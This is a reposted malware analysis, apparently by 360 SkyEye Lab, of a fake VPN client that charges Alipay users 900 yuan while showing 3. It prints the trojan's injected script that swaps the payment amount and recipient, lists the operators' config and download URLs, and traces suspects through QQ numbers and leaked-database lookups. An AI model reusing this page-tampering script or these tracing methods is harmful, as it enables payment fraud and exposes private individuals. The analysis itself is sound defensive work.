神刀安全网

转账3块扣1900?对支付宝木马的分析与追踪

*本文作者:360天眼实验室

背景

人在做,天在看。

支付宝作为国内在线支付市场的老大饱受恶意代码的侵扰,黑产总在如何通过支付宝骗取钱财上发挥着聪明才智。

熟悉网络安全、破解逆向的朋友一定对于 52pojie 这个网站不会感到陌生,它是我国为数不多的关注计算机软件安全的技术网站。本次事件发端于 52pojie 上的一篇名为 支付宝转 3 块扣 1900 ,这是咋回事 的贴子,说了这样一个经历: 楼主在网上买 VPN 代理想科学上网,用支付宝付款时显示 3 块钱,但输完支付宝验证码后却被扣了 1900 元。而这背后究竟发生了些什么?

过程分析

根据帖子中的描述,我们试着访问提及的网站 h xx p://cctv168.cc/ ,而网友之所以找到这个网站,是通过搜索引擎搜索 VPN 的时候,进入钓鱼页面,然后网友下载该 VPN 而受骗,而现在搜索关键词“ VPN ”已经找不到这个站了。如图:

转账3块扣1900?对支付宝木马的分析与追踪

在浏览器中输入网址,回车后现在看到明确的恶意网站提示:

转账3块扣1900?对支付宝木马的分析与追踪

我们当然忽略警告继续访问,背后的网站是这个样子:

转账3块扣1900?对支付宝木马的分析与追踪

帖子中的当事人很可能没能安装使用 360 卫士,不然几乎不可能在层层提示下还会一条道走到黑。现实是我们的可怜楼主可能真的就下载运行了恶意网站诱导的所谓 VPN 客户端程序,样本运行后,向用户展示界面如下界面:

转账3块扣1900?对支付宝木马的分析与追踪

当然,只是不管你在何时以何种姿势点击连接,都会提示您会员已经过期。没办法,只有点击购物车按钮,购买会员才能使用。

在购买界面,给出的应付金额是 3 元,在这个黄金周的旅游景区,上个厕所都比这个贵,所以分分钟就点击了同意开通。

转账3块扣1900?对支付宝木马的分析与追踪

事实上点击了同意开通后,样本执行了如下不为用户所知的动作:

1. 访问 http://463038264.lofter.com 网站,读取到包括每次转账的金额(这里为每次转 900 元)、转账时显示的支付宝姓名(这里为长江电子商务有限公司)以及支付宝账号( lrh103272@163.com )等配置信息。

转账3块扣1900?对支付宝木马的分析与追踪

2.  带着 http://www.alipay.com 参数启动 IEXPLORE.EXE ,使用易语言(恶意代码作者的日常之选)封装的 DOM 类库,查找当前浏览器是不是正在进行付款操作。

转账3块扣1900?对支付宝木马的分析与追踪

3.  如果当前正在进行付款操作,根据付款的流程,修改网页的显示。使用易语言的类成员方法( 0x4040DB 处),修改页面显示内容。此处方法有两个参数,参数一为“ exescript ”,参数二为要运行的脚本代码。将页面上显示的金额信息与付款金额填写为下图样式。至此,细心的人应该发现,软件能够帮你把金额和收款人自动填写上,当然也可以悄无声息地修改信息。

转账3块扣1900?对支付宝木马的分析与追踪

参数二的脚本内容为:

seajs.use("jquery",function($)

{$(‘#reason’).val(‘USERvpn111 MCZ2016254525’);

$(‘#ipt-search-key’).val(‘lrh103272@163.com’);

vara1=$(‘#amount’).clone();

$(‘#amount’).css(‘display’,’none’);

$(‘#amunt’).val(‘900’);a1.val(‘3’);

a1.attr(‘id’,’amount1′);

a1.removeAttr(‘name’);

a1.insertAfter($(‘label[for="amount"]’));

}

);

转账3块扣1900?对支付宝木马的分析与追踪

4.  在上一步的操作中,支付宝实际支付的金额已经被修改成了 900 元,只不是因为软件作者通过脚本将显示的数字改成 3 元。在支付宝付款过程中,单击下一步后,正常的页面应该是这样的:

转账3块扣1900?对支付宝木马的分析与追踪

而在软件的帮忙下通过 0x 4046D6 处函数的调用将页面做了瞒天过海式的修改:

一、将付款金额改成 3 元,

二、将收款人修改成 长江电子商务有限公司 ,在短短不到一秒钟的时间里,让人眼不见心不烦,提升了购物体验。

转账3块扣1900?对支付宝木马的分析与追踪

修改页面的代码:

转账3块扣1900?对支付宝木马的分析与追踪

5.  在付款的最后一步,使用与第四步同样的障眼手法。被修改之前:

转账3块扣1900?对支付宝木马的分析与追踪

转账3块扣1900?对支付宝木马的分析与追踪

修改后:

转账3块扣1900?对支付宝木马的分析与追踪

6.  最后,真实的交易数据被发送到服务器。事已至此,虽然肉眼已经无法再辨别出网页显示其实已经被篡改过,但从网络流量中发出的付款金额为 900 元。

转账3块扣1900?对支付宝木马的分析与追踪

此时,看起来只支持了 3 元的一次完整购买过程就结束了。待事后事主看支付宝日志记录,才会发现转出的是 900 元,而不是 3 元。而这时,木马作者极可能正拿着这些钱吃着火锅唱着歌,还把着妹……

木马溯源

木马使用易语言编写,原理也并不复杂,技术方面没有太多值得细讲的地方。我们关心的是这种盗钱木马出自谁手?又经谁手进入网络?依赖 360 威胁情报中心的数据,追查其幕后黑手却也并不是什么难事,接着往下看。

样本中的配置文件来自于 http://463038264.lofter.com 网站,网页上出现了两个可疑的号码, 463038264 2953766158 ,确认两个号码是 QQ 号。

转账3块扣1900?对支付宝木马的分析与追踪

QQ 签名信息是“ 1 1000 钻石充值地址: http://dwz.cn/34thJj   (下载前关闭杀毒),活动仅限于 4 9 号晚 12 点,明天恢复正常价格!”,访问 http://dwz.cn/34thJj ,得到一批同源样本:

转账3块扣1900?对支付宝木马的分析与追踪

通过特征从 360 样本库中找到一些同源样本,发现木马作者有好多种骗钱的程序,整理后如图:

转账3块扣1900?对支付宝木马的分析与追踪

通过对同源样本的挖掘和网上某社工库的查询,发现该团伙如下:牧马人 A 和开发人员 B

一、  牧马人 A

牧马人 A 是实际操作诈骗的人。根据配置网页中提供的号码为 2053766158 ,如图为该 QQ 的个人资料页 :

转账3块扣1900?对支付宝木马的分析与追踪

通过搜索该 QQ 号,可以确定这个 QQ 号属于木马使用者,这是网友李安在 5 14 日发的被诈骗的信息:

转账3块扣1900?对支付宝木马的分析与追踪

通过对该 QQ 和同源样本的挖掘找到了该 QQ 作者的大号: 258 ****

转账3块扣1900?对支付宝木马的分析与追踪

而且,还有一名徒弟的出场客串:

转账3块扣1900?对支付宝木马的分析与追踪

该帅哥的价值观严重扭曲:

转账3块扣1900?对支付宝木马的分析与追踪

同时,通过样本又关联到该木马作者的两外要给另外一配置文件地址:

http://yanhuaxiang396.lofter.com/

转账3块扣1900?对支付宝木马的分析与追踪

深入挖掘,发现他们开了一家公司: 扬州 ** 电子商务有限公司 ,这公司当然做 SEO 非常牛逼,因为是电子商务公司,而 A 有可能是公司的一个员工,在干私活,通过学到的 SEO 技术去做优化,把自己的 VPN 钓鱼站拍到搜索引擎前面。

转账3块扣1900?对支付宝木马的分析与追踪

二、开发人员 B

开发人员 B 是诈骗软件开发的人,同时还是 一个定制开发易语言程序的,他的 QQ 12077*****

转账3块扣1900?对支付宝木马的分析与追踪

然后从 QQ 的个人说明中,找到了他家的店铺:

转账3块扣1900?对支付宝木马的分析与追踪

转账3块扣1900?对支付宝木马的分析与追踪

根据他阿里旺旺的信息,找到了另外的一个 QQ 10092*****

转账3块扣1900?对支付宝木马的分析与追踪

通过对该 QQ 小号的关联,发现了他的大号 4470 ***** ,从资料上看是一个从事互联网行业的人,吉林的,从群关系数据库可以看出他学习易语言和开发外挂已经很久了:

转账3块扣1900?对支付宝木马的分析与追踪

通过查询群关系数据库,

转账3块扣1900?对支付宝木马的分析与追踪

通过搜索引擎搜索该 QQ ,找到了作者的手机、邮箱和真名,如图:

转账3块扣1900?对支付宝木马的分析与追踪

这是整个团伙的分工图:

转账3块扣1900?对支付宝木马的分析与追踪

此外,作者充值业务广泛,包含但不限于以下业务:

转账3块扣1900?对支付宝木马的分析与追踪

转账3块扣1900?对支付宝木马的分析与追踪

转账3块扣1900?对支付宝木马的分析与追踪

转账3块扣1900?对支付宝木马的分析与追踪

小结

木马作者使用的手段并不新奇,如果当时能够不轻信,如果当时能够不关杀软……但是没有如果。不夸张地说,现今的网络处处遍布陷井,保持安全软件的实时防护状态并及时安装漏洞补丁,才有可能在这魔鬼出没的世界中避免遭受欺诈和数字绑票。但是,武装到牙齿就够了吗?很多时候人总是带着侥幸的心理,人性的弱点最难以克服, no patch to stupid ,再强大的安全工具在哪怕不那么高明的社工面前也往往一触即溃。控制好奇心,抵制贪婪,遏制恐惧,这些是一生的修行。

顺祝各位看官 520 表白成功!

*本文作者:360天眼实验室,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 转账3块扣1900?对支付宝木马的分析与追踪

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址